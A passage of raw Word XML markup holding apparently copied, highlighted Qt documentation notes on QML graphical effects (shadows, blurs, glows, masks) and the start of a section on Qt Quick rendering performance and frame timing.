        </w:rPr>
        <w:t>Drop Shadow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="831"/>
      <w:bookmarkEnd w:id="832"/>
      <w:bookmarkEnd w:id="833"/>
      <w:bookmarkEnd w:id="834"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8952"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283"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>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01" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>DropShadow</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Generates a soft shadow behind the source item</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02" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>InnerShadow</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Generates a colorized and blurred shadow inside the source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="835" w:name="blur"/>
      <w:bookmarkStart w:id="836" w:name="_Toc483000707"/>
      <w:bookmarkStart w:id="837" w:name="_Toc483003724"/>
      <w:bookmarkStart w:id="838" w:name="_Toc483604059"/>
      <w:bookmarkStart w:id="839" w:name="_Toc483605279"/>
      <w:bookmarkEnd w:id="835"/>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Blur</w:t>
      </w:r>
      <w:bookmarkEnd w:id="836"/>
      <w:bookmarkEnd w:id="837"/>
      <w:bookmarkEnd w:id="838"/>
      <w:bookmarkEnd w:id="839"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9362"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693"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>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03" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>FastBlur</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Applies a fast blur effect to one or more source items</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04" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>GaussianBlur</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Applies a higher quality blur effect</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05" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>MaskedBlur</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Applies a blur effect with a varying intesity</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06" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>RecursiveBlur</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Blurs repeatedly, providing a strong blur effect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="840" w:name="motion-blur"/>
      <w:bookmarkStart w:id="841" w:name="_Toc483000708"/>
      <w:bookmarkStart w:id="842" w:name="_Toc483003725"/>
      <w:bookmarkStart w:id="843" w:name="_Toc483604060"/>
      <w:bookmarkStart w:id="844" w:name="_Toc483605280"/>
      <w:bookmarkEnd w:id="840"/>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Motion Blur</w:t>
      </w:r>
      <w:bookmarkEnd w:id="841"/>
      <w:bookmarkEnd w:id="842"/>
      <w:bookmarkEnd w:id="843"/>
      <w:bookmarkEnd w:id="844"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8692"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023"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>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07" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>DirectionalBlur</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Applies blur effect to the specified direction</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08" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>RadialBlur</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Applies directional blur in a circular direction around the items center point</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09" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>ZoomBlur</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Applies directional blur effect towards source items center point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="845" w:name="glow"/>
      <w:bookmarkStart w:id="846" w:name="_Toc483000709"/>
      <w:bookmarkStart w:id="847" w:name="_Toc483003726"/>
      <w:bookmarkStart w:id="848" w:name="_Toc483604061"/>
      <w:bookmarkStart w:id="849" w:name="_Toc483605281"/>
      <w:bookmarkEnd w:id="845"/>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Glow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="846"/>
      <w:bookmarkEnd w:id="847"/>
      <w:bookmarkEnd w:id="848"/>
      <w:bookmarkEnd w:id="849"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8326"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657"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>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10" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>Glow</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Generates a halo like glow around the source item</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11" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>RectangularGlow</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Generates a blurred and colorized rectangle, which gives the impression that the source is glowing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3" w:rsidP="00E51DF3">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="360" w:after="240"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="850" w:name="mask"/>
      <w:bookmarkStart w:id="851" w:name="_Toc483000710"/>
      <w:bookmarkStart w:id="852" w:name="_Toc483003727"/>
      <w:bookmarkStart w:id="853" w:name="_Toc483604062"/>
      <w:bookmarkStart w:id="854" w:name="_Toc483605282"/>
      <w:bookmarkEnd w:id="850"/>
      <w:r w:rsidRPr="00E51DF3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mask</w:t>
      </w:r>
      <w:bookmarkEnd w:id="851"/>
      <w:bookmarkEnd w:id="852"/>
      <w:bookmarkEnd w:id="853"/>
      <w:bookmarkEnd w:id="854"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="8853"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184"/>
        <w:gridCol w:w="5669"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E51DF3" w:rsidRPr="002230B8" w:rsidTr="00E51DF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12" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>OpacityMask</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Masks the source item with another item</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E51DF3" w:rsidRPr="002230B8" w:rsidTr="00E51DF3">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490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId613" w:history="1">
              <w:r w:rsidR="00E51DF3" w:rsidRPr="005D1E34">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:highlight w:val="yellow"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>ThresholdMask</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51DF3" w:rsidRPr="00E51DF3" w:rsidRDefault="00E51DF3">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E51DF3">
              <w:rPr>
                <w:color w:val="404244"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Masks the source item with another item and applies a threshold value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00CB2AF2" w:rsidRDefault="005D1E34" w:rsidP="00CD6118">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:bookmarkStart w:id="855" w:name="_Toc483000711"/>
    <w:bookmarkStart w:id="856" w:name="_Toc483003728"/>
    <w:p w:rsidR="00162275" w:rsidRPr="00162275" w:rsidRDefault="00162275" w:rsidP="00162275">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>http://doc.qt.io/qt-5/qtquick-performance.html</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve">" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00162275">
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>http://doc.qt.io/qt-5/qtquick-performance.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="000A30B1" w:rsidRDefault="005D1E34" w:rsidP="000A30B1">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="857" w:name="_Toc483604063"/>
      <w:bookmarkStart w:id="858" w:name="_Toc483605283"/>
      <w:r w:rsidRPr="000A30B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Performance Considerations And Suggestions</w:t>
      </w:r>
      <w:bookmarkEnd w:id="855"/>
      <w:bookmarkEnd w:id="856"/>
      <w:bookmarkEnd w:id="857"/>
      <w:bookmarkEnd w:id="858"/>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="001F1E57" w:rsidRDefault="005D1E34" w:rsidP="000A30B1">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="859" w:name="timing-considerations"/>
      <w:bookmarkStart w:id="860" w:name="_Toc483000712"/>
      <w:bookmarkStart w:id="861" w:name="_Toc483003729"/>
      <w:bookmarkStart w:id="862" w:name="_Toc483604064"/>
      <w:bookmarkStart w:id="863" w:name="_Toc483605284"/>
      <w:bookmarkEnd w:id="859"/>
      <w:r w:rsidRPr="000A30B1">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Timing Considerations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="860"/>
      <w:bookmarkEnd w:id="861"/>
      <w:bookmarkEnd w:id="862"/>
      <w:bookmarkEnd w:id="863"/>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As an application developer, you must strive to allow the rendering engine to achieve a consistent </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>60 frames-per-second refresh rate</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. 60 </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>FPS</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> means that there is approximately </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>16 milliseconds between each frame</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in which processing can be done, which includes the processing required to </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>upload the draw primitives to the graphics hardware</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>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In practice, this means that the application developer should:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="001F1E57" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use asynchronous, event-driven programming wherever possible</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="005D1E34" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use worker threads to do significant processing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="001F1E57" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>never manually spin the event loop</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="001F1E57" w:rsidRDefault="005D1E34" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="39"/>
        </w:numPr>
        <w:spacing w:before="192" w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>never spend more than a couple of milliseconds per frame within blocking functions</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Failure to do so will result in </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>skipped frames</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, which has a </w:t>
      </w:r>
      <w:r w:rsidRPr="001F1E57">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>drastic effect on the user experience</w:t>
      </w:r>
      <w:r w:rsidRPr="005D1E34">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005D1E34" w:rsidRPr="00615FAD" w:rsidRDefault="005D1E34" w:rsidP="005D1E34">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:lang w:val="be-BY"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Note:</w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A pattern which is tempting, but should</w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>never</w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be used, is creating your own</w:t>
      </w:r>
      <w:r w:rsidRPr="00615FAD">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId614" w:history="1">
        <w:r w:rsidRPr="00615FAD">
          <w:rPr>
            <w:rStyle w:val="a3"/>
